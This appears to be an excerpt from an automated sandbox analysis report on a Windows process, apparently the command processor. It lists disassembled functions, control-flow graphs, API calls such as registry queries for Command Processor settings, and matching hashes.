                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,001CC9B0,00000008), ref: 0019875B
                                                                                                                                                                                                                          • setlocale.MSVCRT ref: 00198770
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                          • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                          • Opcode ID: 9f0c252364704bf2b6261c4fdbfa289717e70fff67b83e7a7d6f421ac524a094
                                                                                                                                                                                                                          • Instruction ID: 9c3accf7d20d72720308481c01f0de66fc8de84ab196e03a6b6bf05b9a832922
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f0c252364704bf2b6261c4fdbfa289717e70fff67b83e7a7d6f421ac524a094
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEC1E579704292A6DF348F358E88B7B37ECAF56754F24012AE846EA586EB74CD41C360
                                                                                                                                                                                                                          Function 001A0207 Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 833 1a0207-1a0236 834 1a0239-1a0242 833->834 834->834 835 1a0244-1a024a 834->835 836 1a037d 835->836 837 1a0250-1a0255 835->837 841 1ae739-1ae750 _wcsicmp 836->841 838 1a0259-1a0263 837->838 839 1a028c-1a02a9 FindFirstFileW 838->839 840 1a0265-1a0268 838->840 844 1ae798-1ae79b 839->844 845 1a02af-1a02bf FindClose 839->845 840->839 846 1a026a-1a0270 840->846 842 1ae756-1ae75d 841->842 843 1a02c5-1a02cf 841->843 848 1a02d2-1a02dd 843->848 845->843 847 1a034d-1a0351 845->847 846->838 849 1a0272-1a0289 call 1a6b30 846->849 847->842 851 1a0357-1a0372 _wcsnicmp 847->851 848->848 850 1a02df-1a02f7 848->850 850->836 854 1a02fd-1a02ff 850->854 851->843 855 1a0378 851->855 856 1ae762-1ae764 854->856 857 1a0305-1a0348 memcpy call 19f3a0 854->857 855->841 858 1ae767-1ae772 856->858 857->846 858->858 860 1ae774-1ae791 memmove 858->860 860->844
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 001A0297
                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 001A02B0
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 001A0311
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001A0367
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001AE746
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 242869866-0
                                                                                                                                                                                                                          • Opcode ID: 1323327dfe43e077fb4fee780b6da70f9b7ef1a3dc9051bf011baba41f29c5a6
                                                                                                                                                                                                                          • Instruction ID: f504163ede72bfa97925494d4517b4fef18f937b81f583ddbf88ac157452e92e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1323327dfe43e077fb4fee780b6da70f9b7ef1a3dc9051bf011baba41f29c5a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851B0796083018BCB25DF68DC486ABB7E5BFD9310F15491EF889C3240E731D945CB96
                                                                                                                                                                                                                          Function 001A6EC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E70), ref: 001A6EC5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                          • Opcode ID: e4ecb49bf7041c97c1c48806948eebf0523ec99017c2f3964740cd8c2df34c8f
                                                                                                                                                                                                                          • Instruction ID: 40bb66ee1317b790b9bbb30ae5679053e7a699bb811d6a0f50c4f9cab25ce0f8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4ecb49bf7041c97c1c48806948eebf0523ec99017c2f3964740cd8c2df34c8f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 939002A829310086D700E7719C0940577B15F496027854452F051C5454DB6C40445526
                                                                                                                                                                                                                          Function 001987CA Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 270memorylibraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 1987ca-198870 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 19e310 call 19a9d4 call 198b96 call 198273 GetCommandLineW 9 198873-19887c 0->9 9->9 10 19887e-19888a 9->10 11 198890-19889f call 1a1a05 10->11 12 198b37-198b38 10->12 18 198b2f-198b35 11->18 19 1988a5-1988db GetCommandLineW call 19f3a0 call 19e3f0 11->19 13 198b3d-198b43 call 1978e4 12->13 21 198b44-198b4c call 1a7d18 13->21 18->13 19->18 27 1988e1-1988e9 19->27 28 1988eb 27->28 29 1988f0-198903 call 198e9e call 1a00e9 27->29 28->29 34 198906-19890f 29->34 34->34 35 198911-198930 call 19a24c 34->35 38 198932 35->38 39 198934-19893d 35->39 38->39 40 1989ab-1989e1 GetConsoleOutputCP GetCPInfo call 198572 GetProcessHeap HeapAlloc 39->40 41 19893f-198943 39->41 47 1989fd-198a03 40->47 48 1989e3-1989f1 GetConsoleTitleW 40->48 43 198945 41->43 44 198947-198951 41->44 43->44 44->40 46 198953-19895a 44->46 46->40 49 19895c-19895e 46->49 51 198a51-198a57 47->51 52 198a05-198a0f call 199a11 47->52 48->47 50 1989f3-1989fa 48->50 53 198960 49->53 54 198962-198979 call 1978e4 49->54 50->47 55 198a59-198a8b call 1b70d6 call 194d08 call 1963bd call 199950 51->55 56 198abb-198b08 GetModuleHandleW GetProcAddress * 3 51->56 52->51 67 198a11-198a1b 52->67 53->54 68 19897b 54->68 69 198980-19898f GetWindowsDirectoryW 54->69 87 198a8d-198aa5 call 199950 * 2 55->87 88 198aa7-198ab0 call 1978e4 55->88 60 198b0a-198b0d 56->60 61 198b14-198b16 56->61 60->61 65 198b0f-198b12 60->65 66 198b17-198b28 free call 1a6b30 61->66 65->61 65->66 76 198b2d-198b2e 66->76 72 198a1d-198a32 GetStdHandle GetConsoleScreenBufferInfo 67->72 73 198a4c call 1b8496 67->73 68->69 69->21 74 198995-19899d 69->74 77 198a40-198a4a 72->77 78 198a34-198a3e 72->78 73->51 79 19899f 74->79 80 1989a4-1989a6 call 198bc7 74->80 77->51 77->73 78->51 79->80 80->40 93 198ab1-198ab5 GlobalFree 87->93 88->93 93->56
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(001CCA04), ref: 001987EE
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001987FA
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0019880E
                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(001B7460,00000001), ref: 0019881B
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00198828
                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00198830
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019883C
                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00198844
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E318
                                                                                                                                                                                                                            • Part of subcall function 0019E310: SetConsoleMode.KERNELBASE(00000000), ref: 0019E322
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E32F
                                                                                                                                                                                                                            • Part of subcall function 0019E310: GetConsoleMode.KERNELBASE(00000000), ref: 0019E339
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E35E
                                                                                                                                                                                                                            • Part of subcall function 0019E310: GetConsoleMode.KERNELBASE(00000000), ref: 0019E368
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E390
                                                                                                                                                                                                                            • Part of subcall function 0019E310: SetConsoleMode.KERNELBASE(00000000), ref: 0019E39A
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0019A9C5), ref: 0019A9D8
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0019A9F3
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0019A9FA
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0019AA09
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0019AA12
                                                                                                                                                                                                                            • Part of subcall function 00198B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0019885E), ref: 00198B9D
                                                                                                                                                                                                                            • Part of subcall function 00198B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019885E), ref: 00198BA4
                                                                                                                                                                                                                            • Part of subcall function 00198273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 001982D3
                                                                                                                                                                                                                            • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00198313
                                                                                                                                                                                                                            • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0019834D
                                                                                                                                                                                                                            • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0019839D
                                                                                                                                                                                                                            • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 001983D7
                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0019886A
                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001988A5
                                                                                                                                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00198987
                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 001989AB
                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001989BC
                                                                                                                                                                                                                            • Part of subcall function 00198572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,001CC9E0,00000008), ref: 0019859E
                                                                                                                                                                                                                            • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 001985BC
                                                                                                                                                                                                                            • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00198614
                                                                                                                                                                                                                            • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00198653
                                                                                                                                                                                                                            • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,001CC9D0,00000008), ref: 0019867D
                                                                                                                                                                                                                            • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,001CC970,00000020), ref: 00198698
                                                                                                                                                                                                                            • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,001CC930,00000020), ref: 001986B0
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 001989CD
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001989D4
                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 001989E9
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00198A23
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00198A2A
                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00198AB5
                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00198AC0
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00198AD1
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00198AE7
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00198AF8
                                                                                                                                                                                                                          • free.MSVCRT(?), ref: 00198B18
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                                                                                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                          • API String ID: 3313898297-3021193919
                                                                                                                                                                                                                          • Opcode ID: 25de36c548135f6164a7730c1f80b04f65100edd9ecae307881b6b1233e4705a
                                                                                                                                                                                                                          • Instruction ID: 4fac90d609145e5355a29b066c7d880ed340bce1c6ac3aa8895e7554f6c89395
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25de36c548135f6164a7730c1f80b04f65100edd9ecae307881b6b1233e4705a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B91BE71A02301ABDF14EBA4AC1AEBE37A5EF95700B44441AF506DB6A1EF70DD81CB52
                                                                                                                                                                                                                          Function 00198273 Relevance: 47.6, APIs: 18, Strings: 9, Instructions: 309registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 96 198273-1982b7 call 1a7f80 99 1982bd-1982db RegOpenKeyExW 96->99 100 1982e1-19831b RegQueryValueExW 99->100 101 198540-19854c 99->101 102 198321-198355 RegQueryValueExW 100->102 103 1ab0f1-1ab0f8 100->103 101->99 104 198552-198571 time srand call 1a6b30 101->104 105 198371-1983a5 RegQueryValueExW 102->105 106 198357-19835e 102->106 108 1ab0fa-1ab108 103->108 109 1ab10d-1ab114 103->109 113 1983ab-1983df RegQueryValueExW 105->113 114 1ab165-1ab16c 105->114 111 1ab139-1ab140 106->111 112 198364-19836a 106->112 108->102 109->102 110 1ab11a-1ab134 _wtol 109->110 110->102 111->105 116 1ab146-1ab160 _wtol 111->116 112->105 119 1983fb-19842f RegQueryValueExW 113->119 120 1983e1-1983e8 113->120 117 1ab16e-1ab17c 114->117 118 1ab181-1ab188 114->118 116->105 117->113 118->113 121 1ab18e-1ab1a8 _wtol 118->121 124 19846c-1984a0 RegQueryValueExW 119->124 125 198431-198438 119->125 122 1ab1ad-1ab1b4 120->122 123 1983ee-1983f5 120->123 121->113 122->119 126 1ab1ba-1ab1cb wcstol 122->126 123->119 129 1ab24c-1ab254 124->129 130 1984a6-1984ad 124->130 127 19843e-19844e 125->127 128 1ab1d3-1ab1da 125->128 126->128 135 1ab200-1ab202 127->135 136 198454-19845d 127->136 133 1ab1dc-1ab1ed wcstol 128->133 134 1ab1f5 128->134 142 1ab25a-1ab25d 129->142 131 1ab20f-1ab216 130->131 132 1984b3-1984c3 130->132 140 1ab218-1ab229 wcstol 131->140 141 1ab231 131->141 138 1984c9-1984d2 132->138 139 1ab23c-1ab23e 132->139 133->134 134->135 137 1ab203-1ab20a 135->137 136->137 143 198463-198466 136->143 137->124 144 1984d8-1984db 138->144 145 1ab23f-1ab241 138->145 139->145 140->141 141->139 146 1ab263-1ab269 142->146 147 1984f4 142->147 143->124 143->137 144->145 148 1984e1-1984eb 144->148 145->129 149 1984fa-19852e RegQueryValueExW 146->149 147->149 150 1ab26e-1ab271 147->150 148->142 151 1984f1 148->151 152 1ab283-1ab28a 149->152 153 198534 149->153 150->149 154 1ab277-1ab27e 150->154 151->147 155 1ab2d9-1ab2e1 152->155 156 1ab28c-1ab2b5 ExpandEnvironmentStringsW 152->156 153->101 154->149 155->153 159 1ab2e7-1ab2f4 call 19acb0 155->159 157 1ab2ca-1ab2cc 156->157 158 1ab2b7-1ab2c8 call 19f3a0 156->158 161 1ab2d3 157->161 158->161 159->153 161->155
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 001982D3
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00198313
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0019834D
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0019839D
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 001983D7
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00198427
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00198498
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00198526
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0019853A
                                                                                                                                                                                                                          • time.MSVCRT(00000000), ref: 00198554
                                                                                                                                                                                                                          • srand.MSVCRT ref: 0019855B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor$p~du
                                                                                                                                                                                                                          • API String ID: 145004033-181855750
                                                                                                                                                                                                                          • Opcode ID: e1bc1e7d19e362915e0b33f60464a3258956ff7b93db41c1a00e7012ea8db1ab
                                                                                                                                                                                                                          • Instruction ID: afa8372a93c5bdc8dcc848fe255474b9c2a7fc36b60c79351fdaf0d93e6602ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1bc1e7d19e362915e0b33f60464a3258956ff7b93db41c1a00e7012ea8db1ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2C1A039905299EAEF329B50DD44BD977B8FF19702F1040E7E689A2090DBB49EC8CF15
                                                                                                                                                                                                                          Function 001A09B1 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 242registrythreadmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 276 1a09b1-1a0a12 GetCurrentThreadId OpenThread call 19e2af HeapSetInformation RegOpenKeyExW 279 1a0a18-1a0a50 call 1a1f5b call 1a1f1a call 1987ca 276->279 280 1ae9c5-1ae9f0 RegQueryValueExW 276->280 289 1a0a55-1a0a59 279->289 286 1ae9f5-1aea03 call 1963bd call 1b4840 280->286 295 1aea08-1aea10 call 1a1e70 286->295 289->286 291 1a0a5f-1a0a66 289->291 293 1aea58-1aea6d _setjmp3 291->293 294 1a0a6c-1a0a81 _setjmp3 291->294 298 1aea6f-1aea71 293->298 299 1aea82-1aea85 293->299 296 1aea1c-1aea24 294->296 297 1a0a87 294->297 312 1aea12 295->312 301 1a0a8a-1a0a8c 296->301 302 1aea2a-1aea2d 296->302 297->301 298->299 305 1aea73-1aea7b call 1a1e70 298->305 303 1aeaaa-1aeab3 call 19dd98 299->303 304 1aea87-1aea95 call 1963bd call 1b4840 299->304 309 1a0a8e 301->309 310 1a0ac5-1a0ac7 301->310 302->301 322 1aeac6-1aeac7 call 1a62c0 303->322 323 1aeab5-1aeac5 _setmode 303->323 329 1aea9a-1aeaa2 call 1a1e70 304->329 319 1aea7d 305->319 317 1a0a90-1a0a96 309->317 314 1a0acd-1a0ad5 call 1a1e70 310->314 315 1aea52 310->315 312->296 335 1a0ad7 314->335 315->293 324 1a0a98-1a0a9c 317->324 325 1a0ae0-1a0af1 call 19c570 317->325 328 1aeb7f 319->328 332 1aeacc-1aeaff EnterCriticalSection LeaveCriticalSection call 19c570 322->332 323->322 324->317 327 1a0a9e-1a0aba call 19e310 GetConsoleOutputCP GetCPInfo call 19e2af 324->327 341 1aea41-1aea49 call 1a1e70 325->341 342 1a0af7-1a0afa 325->342 352 1a0abf 327->352 346 1aeaa4 329->346 351 1aeb01-1aeb04 332->351 340 1a0ada exit 335->340 340->325 358 1aea4b-1aea4d 341->358 347 1aea32-1aea3a call 1a1e70 342->347 348 1a0b00-1a0b04 call 19e470 342->348 346->303 360 1aea3c 347->360 354 1a0b09-1a0b0b 348->354 356 1aeb06-1aeb70 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo call 19e2af call 19e470 call 19e310 GetConsoleOutputCP GetCPInfo call 19e2af 351->356 357 1aeb75-1aeb7d call 1a1e70 351->357 352->310 354->324 359 1a0b0d-1a0b10 354->359 356->332 357->328 358->340 359->324 360->328
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001A09CB
                                                                                                                                                                                                                          • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 001A09D8
                                                                                                                                                                                                                            • Part of subcall function 0019E2AF: SetThreadUILanguage.KERNELBASE ref: 0019E2C6
                                                                                                                                                                                                                          • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 001A09ED
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 001A0A0A
                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 001A0A72
                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE ref: 001A0AA3
                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001A0AB4
                                                                                                                                                                                                                          • exit.KERNELBASE ref: 001A0ADA
                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 001AE9E1
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001AE9EA
                                                                                                                                                                                                                            • Part of subcall function 001A1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,001AEF7C,?,00000000,00000000), ref: 001A1FB2
                                                                                                                                                                                                                            • Part of subcall function 001A1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,001AEF7C,?,00000000,00000000), ref: 001A1FCE
